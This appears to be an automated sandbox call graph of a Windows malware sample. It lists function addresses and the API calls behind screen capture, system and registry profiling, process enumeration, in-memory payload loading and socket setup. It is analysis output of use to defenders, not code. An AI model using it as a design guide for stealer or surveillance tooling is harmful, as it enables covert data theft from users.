11824->11825 11826 3f36ee0 CreateDXGIFactory 11825->11826 11829 3f373cb moneypunct _memmove 11826->11829 11831 3f36f58 moneypunct _memmove 11826->11831 11827 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11828 3f35692 GetForegroundWindow 11827->11828 11828->11369 11828->11370 11829->11827 11831->11829 11832 3f3f858 13 API calls swprintf 11831->11832 11932 3f3ef39 std::exception::exception 11831->11932 11832->11831 11935 3f3eff4 11833->11935 11835 3f36a8f GetCurrentProcessId wsprintfW 11836 3f36910 53 API calls 11835->11836 11837 3f36ab3 _memset 11836->11837 11838 3f36ac7 GetVersionExW 11837->11838 11839 3f36be6 11838->11839 11840 3f36ae9 11838->11840 11841 3f36c14 wsprintfW 11839->11841 11840->11839 11842 3f36b03 GetCurrentProcess OpenProcessToken 11840->11842 11843 3f36c24 11841->11843 11842->11839 11844 3f36b27 GetTokenInformation 11842->11844 11847 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11843->11847 11845 3f36bbb CloseHandle 11844->11845 11846 3f36b49 GetLastError 11844->11846 11849 3f36bd0 11845->11849 11846->11845 11848 3f36b54 LocalAlloc 11846->11848 11850 3f35812 GetCurrentProcessId 11847->11850 11848->11845 11851 3f36b6d GetTokenInformation 11848->11851 11849->11839 11849->11841 11849->11843 11850->11392 11850->11393 11852 3f36b8f GetSidSubAuthorityCount GetSidSubAuthority 11851->11852 11853 3f36bae LocalFree 11851->11853 11852->11853 11853->11845 11855 3f366bc 11854->11855 11857 3f366c4 11854->11857 11855->11396 11856 3f3677d CoUninitialize 11856->11396 11857->11855 11857->11856 11858 3f36747 SysFreeString 11857->11858 11858->11857 11860 3f46770 _memset 11859->11860 11861 3f364c7 RegOpenKeyExW 11860->11861 11862 3f364f0 RegQueryInfoKeyW 11861->11862 11863 3f3662e lstrlenW 11861->11863 11864 3f36673 11862->11864 11875 3f36532 _memset 11862->11875 11863->11864 11868 3f36640 11863->11868 11865 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11864->11865 11867 3f3667f 11865->11867 11866 3f3662c 11866->11863 11867->11404 11869 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11868->11869 11870 3f3666f 11869->11870 11870->11404 11871 3f3661e RegCloseKey 11871->11866 11872 3f36593 RegEnumKeyExW lstrlenW 11873 3f365ce lstrlenW 11872->11873 11872->11875 11873->11875 11874 3f400ab 12 API calls 11874->11875 11875->11866 11875->11871 11875->11872 11875->11874 11882 3f36190 _memset 11876->11882 11877 3f36201 CoCreateInstance 11878 3f36422 lstrlenW 11877->11878 11888 3f3622e _memset 11877->11888 11879 3f36441 11878->11879 11880 3f36431 lstrcatW 11878->11880 11883 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11879->11883 11880->11879 11882->11877 11885 3f361bb lstrcatW lstrcatW 11882->11885 11936 3f36050 11882->11936 11886 3f36477 11883->11886 11884 3f3640a 11884->11878 11885->11882 11886->11406 11887 3f362d3 wsprintfW RegOpenKeyExW 11887->11888 11888->11884 11888->11887 11889 3f3637b RegQueryValueExW 11888->11889 11890 3f363dc RegCloseKey 11889->11890 11891 3f363bc lstrcatW lstrcatW 11889->11891 11890->11888 11891->11890 11951 3f46952 __getptd_noexit 11892->11951 11894 3f403b3 11896 3f35934 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 11894->11896 11958 3f40120 11894->11958 11896->11410 11900 3f403dd 11897->11900 11901 3f403e4 11897->11901 11898 3f3f91b __controlfp_s __getptd_noexit 11899 3f403e9 11898->11899 11902 3f420e2 __controlfp_s 11 API calls 11899->11902 11900->11901 11904 3f40412 11900->11904 11901->11898 11903 3f354dd 11902->11903 11903->11362 11904->11903 11905 3f3f91b __controlfp_s __getptd_noexit 11904->11905 11905->11899 11907 3f3824f 11906->11907 11908 3f3811d 11906->11908 11910 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11907->11910 11908->11907 11909 3f38125 GetLogicalDriveStringsW 11908->11909 11911 3f38202 lstrcpyW 11909->11911 11912 3f38140 11909->11912 11913 3f3825d 11910->11913 11914 3f3820a 11911->11914 11912->11911 11916 3f38160 lstrcmpiW 11912->11916 11919 3f381f6 11912->11919 11913->11400 11915 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11914->11915 11917 3f38219 11915->11917 11916->11912 11918 3f38170 lstrcmpiW 11916->11918 11917->11400 11918->11912 11920 3f38180 QueryDosDeviceW 11918->11920 11919->11911 11920->11914 11921 3f381b0 lstrlenW __wcsnicmp 11920->11921 11921->11912 11922 3f3821d lstrcpyW lstrcatW 11921->11922 11923 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11922->11923 11924 3f3824b 11923->11924 11924->11400 11926 3f4072e swprintf 13 API calls 11925->11926 11927 3f3f871 11926->11927 11927->11807 11929 3f37456 GetSystemInfo 11928->11929 11930 3f3744e GetNativeSystemInfo 11928->11930 11931 3f37460 RegOpenKeyExW RegQueryValueExW 11929->11931 11930->11931 11931->11811 11931->11812 11933 3f41215 __CxxThrowException@8 RaiseException 11932->11933 11934 3f3ef68 std::exception::exception 11933->11934 11934->11831 11937 3f46770 _memset 11936->11937 11938 3f36081 CreateToolhelp32Snapshot 11937->11938 11939 3f360a6 Process32FirstW 11938->11939 11940 3f36095 11938->11940 11942 3f36115 CloseHandle 11939->11942 11946 3f360c3 11939->11946 11941 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11940->11941 11944 3f360a2 11941->11944 11943 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11942->11943 11945 3f3612a 11943->11945 11944->11882 11945->11882 11947 3f36107 Process32NextW 11946->11947 11948 3f3612e CloseHandle 11946->11948 11947->11942 11947->11946 11949 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 11948->11949 11950 3f36147 11949->11950 11950->11882 11952 3f46960 11951->11952 11953 3f4696f 11951->11953 11954 3f3f91b __controlfp_s __getptd_noexit 11952->11954 11955 3f46984 11953->11955 11956 3f46975 __malloc_crt 11953->11956 11957 3f46965 11954->11957 11955->11894 11956->11952 11956->11955 11957->11894 11959 3f4013c 11958->11959 11960 3f4014f _memset 11958->11960 11961 3f3f91b __controlfp_s __getptd_noexit 11959->11961 11963 3f40167 11960->11963 11973 3f40178 11960->11973 11962 3f40141 11961->11962 11964 3f420e2 __controlfp_s 11 API calls 11962->11964 11966 3f3f91b __controlfp_s __getptd_noexit 11963->11966 11965 3f4014b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 11964->11965 11965->11896 11967 3f4016c 11966->11967 11972 3f420e2 __controlfp_s 11 API calls 11967->11972 11968 3f40196 11970 3f3f91b __controlfp_s __getptd_noexit 11968->11970 11969 3f401a7 11993 3f46403 11969->11993 11970->11965 11972->11965 11973->11968 11973->11969 11974 3f401ac 11999 3f466cc 11974->11999 11976 3f401b5 11977 3f4039d 11976->11977 12006 3f466f9 11976->12006 11979 3f42090 __invoke_watson 10 API calls 11977->11979 11980 3f403a7 11979->11980 11982 3f46952 __localtime64 3 API calls 11980->11982 11981 3f401c7 11981->11977 12013 3f46726 11981->12013 11984 3f403b3 11982->11984 11987 3f403c2 11984->11987 11989 3f40120 __localtime64_s 38 API calls 11984->11989 11985 3f401d9 11985->11977 11986 3f401e2 11985->11986 11988 3f40255 __gmtime64_s 11986->11988 11990 3f401f5 __gmtime64_s 11986->11990 11987->11896 11988->11965 11989->11987 11990->11965 11991 3f40213 11990->11991 11991->11965 11992 3f4022b __gmtime64_s 11991->11992 11992->11965 11994 3f4640f ___BuildCatchObject 11993->11994 11995 3f46419 __lock 11994->11995 11998 3f46431 ___BuildCatchObject 11994->11998 11996 3f4642c 11995->11996 11995->11998 12020 3f45d22 11996->12020 11998->11974 12000 3f466ed 11999->12000 12001 3f466d8 11999->12001 12000->11976 12002 3f3f91b __controlfp_s __getptd_noexit 12001->12002 12003 3f466dd 12002->12003 12004 3f420e2 __controlfp_s 11 API calls 12003->12004 12005 3f466e8 12004->12005 12005->11976 12007 3f46705 12006->12007 12008 3f4671a 12006->12008 12009 3f3f91b __controlfp_s __getptd_noexit 12007->12009 12008->11981 12010 3f4670a 12009->12010 12011 3f420e2 __controlfp_s 11 API calls 12010->12011 12012 3f46715 12011->12012 12012->11981 12014 3f46747 12013->12014 12015 3f46732 12013->12015 12014->11985 12016 3f3f91b __controlfp_s __getptd_noexit 12015->12016 12017 3f46737 12016->12017 12018 3f420e2 __controlfp_s 11 API calls 12017->12018 12019 3f46742 12018->12019 12019->11985 12048 3f44300 12020->12048 12022 3f45d2e __lock 12023 3f45d52 __tzset_nolock 12022->12023 12024 3f46726 __tzset_nolock 12 API calls 12023->12024 12025 3f45d5e 12024->12025 12027 3f466cc __tzset_nolock 12 API calls 12025->12027 12046 3f45e1b __tzset_nolock 12025->12046 12026 3f42090 __invoke_watson 10 API calls 12026->12046 12028 3f45d70 12027->12028 12031 3f466f9 __tzset_nolock 12 API calls 12028->12031 12028->12046 12029 3f45e46 GetTimeZoneInformation 12029->12046 12030 3f3f639 _free 3 API calls 12030->12046 12032 3f45d82 12031->12032 12032->12046 12049 3f4b118 __getptd 12032->12049 12034 3f45ead WideCharToMultiByte 12034->12046 12036 3f45ee5 WideCharToMultiByte 12036->12046 12038 3f45de9 _strlen 12040 3f45df0 __malloc_crt 12038->12040 12039 3f4a7e2 12 API calls __tzset_nolock 12039->12046 12042 3f45e06 _strlen 12040->12042 12040->12046 12041 3f46016 __tzset_nolock ___BuildCatchObject 12041->11998 12059 3f41928 12042->12059 12043 3f45db2 __tzset_nolock 12043->12038 12044 3f3f639 _free 3 API calls 12043->12044 12043->12046 12044->12038 12046->12026 12046->12029 12046->12030 12046->12034 12046->12036 12046->12039 12046->12041 12047 3f4b1d0 __wcstoi64 __tzset_nolock 12046->12047 12047->12046 12048->12022 12050 3f45d90 12049->12050 12051 3f4b12a 12049->12051 12053 3f4b1e6 12050->12053 12051->12050 12068 3f45006 12051->12068 12054 3f4b1ff 12053->12054 12055 3f4b1fb 12053->12055 12054->12055 12057 3f4b211 _strlen 12054->12057 12078 3f4c886 12054->12078 12055->12043 12057->12055 12088 3f4c86c 12057->12088 12060 3f41936 12059->12060 12061 3f4193d 12059->12061 12060->12061 12065 3f4195b 12060->12065 12062 3f3f91b __controlfp_s __getptd_noexit 12061->12062 12067 3f41942 12062->12067 12063 3f420e2 __controlfp_s 11 API calls 12064 3f4194c 12063->12064 12064->12046 12065->12064 12066 3f3f91b __controlfp_s __getptd_noexit 12065->12066 12066->12067 12067->12063 12069 3f44300 ___BuildCatchObject 12068->12069 12070 3f45012 __getptd 12069->12070 12071 3f45045 __lock 12070->12071 12072 3f45023 12070->12072 12074 3f44fb9 __updatetlocinfoEx_nolock ___addlocaleref ___removelocaleref ___freetlocinfo 12071->12074 12072->12071 12073 3f45029 __getptd 12072->12073 12075 3f45031 ____lc_codepage_func 12073->12075 12074->12075 12076 3f45035 __amsg_exit 12075->12076 12077 3f4503d ___BuildCatchObject 12075->12077 12076->12077 12077->12050 12079 3f4c8a1 12078->12079 12080 3f4c906 12078->12080 12079->12080 12081 3f4c8a7 WideCharToMultiByte 12079->12081 12087 3f3f639 _free RtlFreeHeap GetLastError __getptd_noexit 12079->12087 12080->12057 12081->12080 12082 3f4c8b9 __calloc_crt 12081->12082 12082->12080 12083 3f4c8ca WideCharToMultiByte 12082->12083 12084 3f4c912 12083->12084 12085 3f4c8dc ___crtsetenv 12083->12085 12086 3f3f639 _free RtlFreeHeap GetLastError __getptd_noexit 12084->12086 12085->12079 12086->12080 12087->12079 12089 3f4c78e __mbsnbicoll_l 15 API calls 12088->12089 12090 3f4c881 12089->12090 12090->12057 12648 3f503d3 12649 3f50381 __CallSettingFrame@12 12648->12649 12652 3f503e8 12649->12652 12654 3f4902e 12649->12654 12651 3f503fe ___BuildCatchObject 12652->12651 12653 3f4902e _GetRangeOfTrysToCheck 18 API calls 12652->12653 12653->12651 12660 3f44300 12654->12660 12656 3f4903a DecodePointer 12657 3f4904a 12656->12657 12661 3f48fe2 12657->12661 12660->12656 12667 3f44300 12661->12667 12663 3f48fee __getptd 12664 3f48ffa 12663->12664 12668 3f3f787 12664->12668 12667->12663 12675 3f42147 DecodePointer 12668->12675 12670 3f3f78c 12673 3f3f797 12670->12673 12676 3f42154 12670->12676 12672 3f3f7af 12673->12672 12674 3f41f67 __call_reportfault 8 API calls 12673->12674 12674->12672 12675->12670 12680 3f42160 ___BuildCatchObject 12676->12680 12677 3f421bb 12678 3f4219d DecodePointer 12677->12678 12682 3f421ca 12677->12682 12686 3f421a9 _siglookup 12678->12686 12679 3f42187 __getptd_noexit 12679->12686 12689 3f42195 _raise ___BuildCatchObject 12679->12689 12680->12677 12680->12678 12680->12679 12684 3f42183 12680->12684 12683 3f3f91b __controlfp_s __getptd_noexit 12682->12683 12685 3f421cf 12683->12685 12684->12679 12684->12682 12688 3f420e2 __controlfp_s 11 API calls 12685->12688 12687 3f4222c __lock 12686->12687 12686->12689 12687->12689 12688->12689 12689->12673 12775 3f411cf 12778 3f442d9 12775->12778 12777 3f411dd 12779 3f442f5 12778->12779 12780 3f442e8 12778->12780 12779->12777 12783 3f4418f __getptd_noexit 12780->12783 12784 3f441a4 12783->12784 12784->12777 10979 401000 10984 401b90 GetProcessHeap 10979->10984 10983 40100a 10985 401005 10984->10985 10986 401b28 10985->10986 10987 401b30 10986->10987 10990 401010 10987->10990 10989 401b47 10989->10983 10997 401e90 CreateFileA 10990->10997 10994 401054 11006 4012c0 10994->11006 10998 401eb4 GetFileSize 10997->10998 10999 401034 10997->10999 11013 401d70 10998->11013 11002 40109e 10999->11002 11003 4010b1 11002->11003 11003->11003 11024 401244 GetProcessHeap 11003->11024 11005 4011a7 11005->10994 11007 4012f1 GetPEB 11006->11007 11008 40132c 11007->11008 11009 401633 VirtualAlloc 11008->11009 11010 401090 11008->11010 11012 401660 11009->11012 11010->10989 11011 4019be LoadLibraryA 11011->11010 11011->11012 11012->11010 11012->11011 11014 401d84 RtlAllocateHeap 11013->11014 11015 401d79 GetProcessHeap 11013->11015 11016 401db5 ReadFile FindCloseChangeNotification 11014->11016 11017 401d99 MessageBoxA 11014->11017 11015->11014 11016->10999 11020 401c00 11017->11020 11021 401c08 11020->11021 11022 401c11 ExitProcess 11021->11022 11023 401c1d 11021->11023 11023->11016 11027 40121d 11024->11027 11026 401274 RtlAllocateHeap 11026->11005 11027->11026 11039 25f811b HeapCreate 13928 3f362b6 13930 3f362c0 _memset 13928->13930 13929 3f362d3 wsprintfW RegOpenKeyExW 13929->13930 13930->13929 13931 3f3637b RegQueryValueExW 13930->13931 13935 3f3640a lstrlenW 13930->13935 13932 3f363dc RegCloseKey 13931->13932 13933 3f363bc lstrcatW lstrcatW 13931->13933 13932->13930 13933->13932 13936 3f36441 13935->13936 13937 3f36431 lstrcatW 13935->13937 13938 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13936->13938 13937->13936 13939 3f36477 13938->13939 12964 3f41b90 12977 3f44300 12964->12977 12966 3f41b9c __lock 12967 3f41bb7 12966->12967 12970 3f41c4d 12966->12970 12968 3f41bce DecodePointer 12967->12968 12967->12970 12969 3f41be5 DecodePointer 12968->12969 12968->12970 12975 3f41bf8 12969->12975 12971 3f41cca ___BuildCatchObject 12970->12971 12972 3f41a78 _doexit 3 API calls 12970->12972 12973 3f41cbb 12972->12973 12974 3f41c0f DecodePointer 12974->12975 12975->12970 12975->12974 12976 3f41c1e DecodePointer DecodePointer 12975->12976 12976->12975 12977->12966 12997 3f3b19d 13005 3f3bc70 7 API calls 12997->13005 12999 3f3b1c1 13000 3f3f707 31 API calls 12999->13000 13002 3f3b235 12999->13002 13001 3f3b1d5 _memset 13000->13001 13003 3f3f858 swprintf 13 API calls 13001->13003 13004 3f3b209 moneypunct 13003->13004 13006 3f3bcf6 GetSystemMetrics 13005->13006 13015 3f3bce5 13005->13015 13008 3f3bd00 13006->13008 13009 3f3bd4b 13006->13009 13007 3f3bd76 GetSystemMetrics 13037 3f501c0 13007->13037 13013 3f3bd0e GetSystemMetrics 13008->13013 13011 3f3bd59 GetSystemMetrics 13009->13011 13011->13015 13013->13015 13014 3f501c0 13016 3f3bd9d CreateCompatibleBitmap SelectObject SetStretchBltMode GetSystemMetrics 13014->13016 13015->13007 13017 3f501c0 13016->13017 13018 3f3bddd GetSystemMetrics 13017->13018 13019 3f501c0 13018->13019 13020 3f3bdf0 StretchBlt 13019->13020 13021 3f3be70 _memset 13020->13021 13022 3f3be7f GetDIBits 13021->13022 13023 3f3bea3 _memset 13022->13023 13024 3f3f707 31 API calls 13023->13024 13025 3f3bef8 13024->13025 13039 3f3c060 GlobalAlloc GlobalLock 13025->13039 13028 3f3bf1f DeleteObject DeleteObject ReleaseDC 13030 3f3bf45 moneypunct 13028->13030 13029 3f3bf99 13032 3f3bfd8 DeleteObject DeleteObject ReleaseDC 13029->13032 13031 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13030->13031 13033 3f3bf93 13031->13033 13034 3f3c001 moneypunct 13032->13034 13033->12999 13035 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13034->13035 13036 3f3c04c 13035->13036 13036->12999 13038 3f3bd88 GetSystemMetrics 13037->13038 13038->13014 13040 3f47660 13039->13040 13041 3f3c0bb GlobalUnlock CreateStreamOnHGlobal 13040->13041 13042 3f3c248 GlobalFree 13041->13042 13043 3f3c0df EnterCriticalSection LeaveCriticalSection 13041->13043 13045 3f3c19d 13042->13045 13063 3f39de0 13043->13063 13047 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13045->13047 13046 3f3c13a 13048 3f3c142 CreateStreamOnHGlobal 13046->13048 13062 3f3c232 13046->13062 13049 3f3bf1b 13047->13049 13050 3f3c156 13048->13050 13048->13062 13049->13028 13049->13029 13071 3f3a460 13050->13071 13052 3f39ba0 6 API calls 13052->13042 13054 3f3c183 GlobalFree 13102 3f39ba0 13054->13102 13055 3f3c1a4 GlobalSize 13058 3f3c1b6 13055->13058 13095 3f3d020 13058->13095 13060 3f3c1e2 moneypunct 13061 3f3c21d GlobalUnlock 13060->13061 13061->13062 13062->13052 13109 3f39ac0 13063->13109 13065 3f39dec 13066 3f39df0 GdipCreateBitmapFromStream 13065->13066 13067 3f39e1e 13065->13067 13068 3f39e17 GdipDisposeImage 13066->13068 13069 3f39e2a 13066->13069 13067->13046 13068->13067 13070 3f39e35 GdipDisposeImage 13069->13070 13070->13046 13072 3f39ac0 3 API calls 13071->13072 13073 3f3a47d 13072->13073 13074 3f3a485 GdipGetImageEncodersSize 13073->13074 13094 3f3a50f 13073->13094 13080 3f3a49b 13074->13080 13074->13094 13075 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13078 3f3a5fc GetHGlobalFromStream GlobalLock 13075->13078 13076 3f3a4e1 13079 3f31280 2 API calls 13076->13079 13077 3f3a4cd 13081 3f3f673 _malloc 20 API calls 13077->13081 13078->13054 13078->13055 13082 3f3a4ba 13079->13082 13080->13076 13080->13077 13080->13082 13081->13082 13083 3f3a519 GdipGetImageEncoders 13082->13083 13084 3f3a4f9 13082->13084 13086 3f3a52c 13083->13086 13083->13094 13085 3f3f639 _free 3 API calls 13084->13085 13084->13094 13085->13084 13087 3f3a5b4 GdipCreateBitmapFromHBITMAP 13086->13087 13088 3f3a56a 13086->13088 13086->13094 13090 3f3a594 GdipSaveImageToStream 13087->13090 13115 3f39a80 GdipCreateBitmapFromScan0 13088->13115 13092 3f3a59f GdipDisposeImage 13090->13092 13093 3f3a5dd GdipDisposeImage 13090->13093 13091 3f3a586 13091->13090 13092->13094 13093->13094 13094->13075 13099 3f3d02b 13095->13099 13096 3f3d08d 13100 3f3d09f 13096->13100 13116 3f392c0 13096->13116 13097 3f3ef39 std::_Xinvalid_argument 3 API calls 13097->13096 13099->13096 13099->13097 13101 3f3d051 13099->13101 13100->13060 13101->13060 13103 3f39bb2 DeleteObject 13102->13103 13104 3f39bd8 EnterCriticalSection 13102->13104 13103->13104 13105 3f39bf3 EnterCriticalSection 13104->13105 13106 3f39c17 LeaveCriticalSection 13104->13106 13107 3f39c03 GdiplusShutdown 13105->13107 13108 3f39c0a LeaveCriticalSection 13105->13108 13106->13045 13107->13108 13108->13106 13110 3f39ad0 13109->13110 13111 3f39ad7 EnterCriticalSection 13109->13111 13110->13065 13112 3f39b21 LeaveCriticalSection 13111->13112 13113 3f39af0 GdiplusStartup 13111->13113 13112->13065 13113->13112 13114 3f39b1f 13113->13114 13114->13112 13115->13091 13117 3f392fb 13116->13117 13118 3f39349 std::exception::exception 13117->13118 13119 3f3f707 31 API calls 13117->13119 13122 3f39344 moneypunct 13117->13122 13120 3f41215 __CxxThrowException@8 RaiseException 13118->13120 13121 3f3933d 13119->13121 13120->13122 13121->13118 13121->13122 13122->13100 13123 25fe22f 13134 25f9e20 13123->13134 13125 25fe23b __getptd 13126 25fe26e 13125->13126 13127 25fe24c 13125->13127 13135 25fc238 13126->13135 13127->13126 13129 25fe252 __getptd 13127->13129 13133 25fe25a 13129->13133 13130 25fe275 __updatetlocinfoEx_nolock 13130->13133 13131 25fe25e __amsg_exit 13132 25fe266 ___DllMainCRTStartup 13131->13132 13133->13131 13133->13132 13134->13125 13136 25fc24d __mtinitlocknum 13135->13136 13137 25fc260 RtlEnterCriticalSection 13135->13137 13136->13137 13138 25fc258 __amsg_exit 13136->13138 13137->13130 13138->13137 13215 3f44b8e 13244 3f44300 13215->13244 13217 3f44b9a __getptd 13245 3f44885 13217->13245 13219 3f44bad 13259 3f44929 _LocaleUpdate::_LocaleUpdate 13219->13259 13222 3f44bc4 __malloc_crt 13223 3f44bd9 13222->13223 13241 3f44ced ___BuildCatchObject 13222->13241 13264 3f449a5 13223->13264 13226 3f44bfe InterlockedDecrement 13228 3f44c0e 13226->13228 13229 3f44c1f InterlockedIncrement 13226->13229 13227 3f44cfa 13231 3f3f639 _free 3 API calls 13227->13231 13235 3f44d0d 13227->13235 13227->13241 13228->13229 13233 3f3f639 _free 3 API calls 13228->13233 13230 3f44c35 13229->13230 13229->13241 13234 3f44c42 __lock 13230->13234 13230->13241 13231->13235 13232 3f3f91b __controlfp_s __getptd_noexit 13232->13241 13236 3f44c1e 13233->13236 13237 3f44c68 InterlockedDecrement 13234->13237 13235->13232 13236->13229 13239 3f44cc5 13237->13239 13240 3f44cd8 InterlockedIncrement 13237->13240 13239->13240 13242 3f3f639 _free 3 API calls 13239->13242 13240->13241 13243 3f44cd7 13242->13243 13243->13240 13244->13217 13276 3f44300 13245->13276 13247 3f44891 __getptd 13248 3f448a2 13247->13248 13249 3f448bf __lock 13247->13249 13248->13249 13250 3f448a8 __setmbcp 13248->13250 13249->13250 13251 3f448d9 13249->13251 13254 3f448af __amsg_exit 13250->13254 13256 3f448b7 ___BuildCatchObject 13250->13256 13252 3f448f7 InterlockedIncrement 13251->13252 13253 3f448dd InterlockedDecrement 13251->13253 13252->13250 13253->13252 13255 3f448e8 13253->13255 13254->13256 13255->13252 13257 3f3f639 _free 3 API calls 13255->13257 13256->13219 13258 3f448f6 13257->13258 13258->13252 13260 3f44966 13259->13260 13261 3f44948 GetOEMCP 13259->13261 13262 3f4496b GetACP 13260->13262 13263 3f44958 13260->13263 13261->13263 13262->13263 13263->13222 13263->13241 13265 3f44929 getSystemCP 3 API calls 13264->13265 13270 3f449c5 13265->13270 13266 3f449d0 setSBCS 13267 3f44b7c 13266->13267 13268 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13267->13268 13271 3f44b8c 13268->13271 13269 3f44a39 _memset 13277 3f446f5 GetCPInfo 13269->13277 13270->13266 13270->13267 13270->13269 13272 3f44a14 IsValidCodePage 13270->13272 13271->13226 13271->13227 13272->13267 13273 3f44a26 GetCPInfo 13272->13273 13273->13269 13274 3f44b70 13273->13274 13274->13266 13274->13267 13276->13247 13278 3f447dd 13277->13278 13280 3f44729 _memset 13277->13280 13283 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13278->13283 13287 3f4abcb _LocaleUpdate::_LocaleUpdate 13280->13287 13282 3f4aa9e ___crtLCMapStringA 29 API calls 13284 3f447b8 13282->13284 13285 3f44883 13283->13285 13286 3f4aa9e ___crtLCMapStringA 29 API calls 13284->13286 13285->13269 13286->13278 13290 3f4aae4 13287->13290 13291 3f4ab02 13290->13291 13292 3f4ab0d MultiByteToWideChar 13290->13292 13291->13292 13293 3f4ab36 13292->13293 13295 3f4ab3a 13292->13295 13294 3f3f00a __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 13293->13294 13296 3f44798 13294->13296 13298 3f4ab4f _memset 13295->13298 13299 3f3f673 _malloc 20 API calls 13295->13299 13296->13282 13297 3f4ab88 MultiByteToWideChar 13300 3f4ab9e GetStringTypeW 13297->13300 13301 3f4abaf 13297->13301 13298->13293 13298->13297 13299->13298 13300->13301 13302 3f4a897 __freea 3 API calls 13301->13302 13302->13293 11028 401dc0 11029 401e06 11028->11029 11030 401dcd 11028->11030 11031 401dd6 11030->11031 11032 401ddb 11030->11032 11036 401bd0 11031->11036 11032->11029 11034 401deb IsBadReadPtr 11032->11034 11034->11029 11035 401df8 RtlFreeHeap 11034->11035 11035->11029 11037 401be0 11036->11037 11038 401bd9 GetModuleHandleA 11036->11038 11037->11032 11038->11037 12360 25f32d0 6 API calls 12091 25f78f3 12092 25f78fe 12091->12092 12093 25f7903 12091->12093 12108 25fb63f 12092->12108 12097 25f77fd 12093->12097 12096 25f7911 12101 25f7809 ___DllMainCRTStartup 12097->12101 12098 25f7861 12112 25f6380 12098->12112 12099 25f784e __CRT_INIT 12099->12098 12105 25f78aa ___DllMainCRTStartup 12099->12105 12101->12098 12101->12099 12101->12105 12103 25f788f 12104 25f789e __CRT_INIT 12103->12104 12103->12105 12104->12105 12105->12096 12106 25f6380 ___DllMainCRTStartup 125 API calls 12107 25f787d __CRT_INIT 12106->12107 12107->12103 12109 25fb664 12108->12109 12110 25fb671 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 12108->12110 12109->12110 12111 25fb668 12109->12111 12110->12111 12111->12093 12113 25f6389 12112->12113 12114 25f63d2 12112->12114 12113->12114 12115 25f6391 lstrlenW 12113->12115 12114->12103 12114->12106 12115->12114 12116 25f63a1 12115->12116 12120 25f5e30 12116->12120 12118 25f63a6 12118->12114 12119 25f63af CreateThread WaitForSingleObject 12118->12119 12119->12114 12129 25f6110 12119->12129 12121 25f5e43 ___DllMainCRTStartup 12120->12121 12128 25f607b 12120->12128 12122 25f5e55 _memset 12121->12122 12123 25f5e77 12122->12123 12124 25f5fe5 RegOpenKeyExW 12123->12124 12125 25f601b RegQueryValueExW 12124->12125 12126 25f6032 12124->12126 12125->12126 12127 25f603c _memset RegQueryValueExW 12126->12127 12126->12128 12127->12128 12128->12118 12146 25f7654 12129->12146 12131 25f6142 Sleep 12148 25f6ff7 12131->12148 12133 25f6ff7 7 API calls 12135 25f617d 12133->12135 12134 25f615d 12134->12133 12140 25f6190 12135->12140 12157 25f5a20 CreateEventW 12135->12157 12137 25f7654 __fassign 12138 25f62a7 Sleep 12137->12138 12139 25f7654 __fassign 12138->12139 12139->12140 12140->12137 12141 25f62f8 CreateEventA 12140->12141 12174 25f2d70 ResetEvent InterlockedExchange timeGetTime socket 12140->12174 12189 25f3130 GetCurrentThreadId 12141->12189 12147 25f763e __fassign 12146->12147 12147->12131 12151 25f7001 12148->12151 12150 25f701b 12150->12134 12151->12150 12153 25f701d 12151->12153 12204 25f6f63 12151->12204 12212 25f8630 RtlDecodePointer 12151->12212 12154 25f705c std::exception::exception __CxxThrowException 12153->12154 12155 25f7030 std::exception::exception 12153->12155 12156 25f705b 12155->12156 12156->12154 12158 25f5a79 12157->12158 12214 25f64e0 HeapCreate 12158->12214 12161 25f5b1c CreateEventW 12163 25f5b5f CreateEventW 12161->12163 12164 25f5b55 12161->12164 12162 25f5b12 12162->12161 12165 25f5b7a 12163->12165 12166 25f5b84 CreateEventW 12163->12166 12164->12163 12165->12166 12167 25f5b9f 12166->12167 12168 25f5ba9 InitializeCriticalSectionAndSpinCount 12166->12168 12167->12168 12169 25f5c6d 12168->12169 12170 25f5c77 